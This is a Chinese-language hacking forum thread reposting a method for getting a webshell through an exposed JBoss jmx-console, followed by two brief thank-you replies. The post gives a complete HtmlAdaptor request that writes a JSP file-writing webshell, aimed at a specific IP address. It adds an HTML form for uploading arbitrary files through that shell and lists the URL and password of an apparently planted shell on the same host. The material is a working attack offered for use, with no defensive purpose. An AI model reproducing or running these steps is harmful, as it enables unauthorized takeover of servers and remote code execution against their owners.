搜索
查看: 1085|回复: 2

利用JBoss漏洞拿webshell方法

[复制链接]

432

主题

573

帖子

2543

积分

核心成员

Rank: 8Rank: 8

积分
2543
发表于 2016-3-1 15:33:46 | 显示全部楼层 |阅读模式
本帖最后由 Jumbo 于 2016-3-7 23:15 编辑

转载备份
通过以下方法getshell
  1. http://210.21.94.48/jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=upload5warn.war&argType=java.lang.String&&arg1=shell&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3c%25+if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%2f%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b+%25%3e&argType=boolean&arg4=True
复制代码
以上访问会生成一个这样的路径文件“/upload5warn/shell.jsp”



再通过以下html可进行文件上传:
  1. <html>

  2. <head>

  3. <meta http-equiv="content-type" content="text/html;charset=utf-8">

  4. <title>jsp-test</title>

  5. </head>

  6. <style>

  7. .main{width:980px;height:600px;margin:0 auto;}

  8. .url{width:300px;}

  9. .fn{width:60px;}

  10. .content{width:80%;height:60%;}

  11. </style>

  12. <script>

  13.   function upload(){

  14.     var url = document.getElementById('url').value,

  15.       content = document.getElementById('content').value,

  16.       fileName = document.getElementById('fn').value,

  17.       form = document.getElementById('fm');

  18.     if(url.length == 0){

  19.       alert("Url not allowd empty!");

  20.       return ;

  21.     }

  22.     if(content.length == 0){

  23.       alert("Content not allowd empty!");

  24.       return ;

  25.     }

  26.     if(fileName.length == 0){

  27.       alert("FileName not allowd empty!");

  28.       return ;

  29.     }

  30.     form.action = url;

  31.     form.submit();

  32.   }

  33. </script>

  34. <body>

  35. <div class="main">

  36.   <form id="fm" method="post">  

  37.     URL:<input type="text" value="http://url/upload5warn/shell.jsp" class="url" id="url" />  

  38.     FileName:<input type="text" name="f" value="css.jsp" class="fn" id="fn" />  

  39.     <a href="javascript:upload();">Upload</a><br/>

  40.     <textarea id="content" class="content" name="t" ></textarea>

  41.   </form>

  42. </div>

  43. </body>

  44. </html>
复制代码
  1. http://210.21.94.48/upload5warn/cssyun.jsp
  2. 密码为:1
复制代码


您可以更新记录, 让好友们知道您在做什么...
Mr.冷雪 该用户已被删除
发表于 2016-3-7 23:14:47 | 显示全部楼层
路过看看,学习了

2

主题

52

帖子

196

积分

我是新手

Rank: 1

积分
196
发表于 2016-3-28 13:14:21 | 显示全部楼层
发帖不易,多谢分享
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表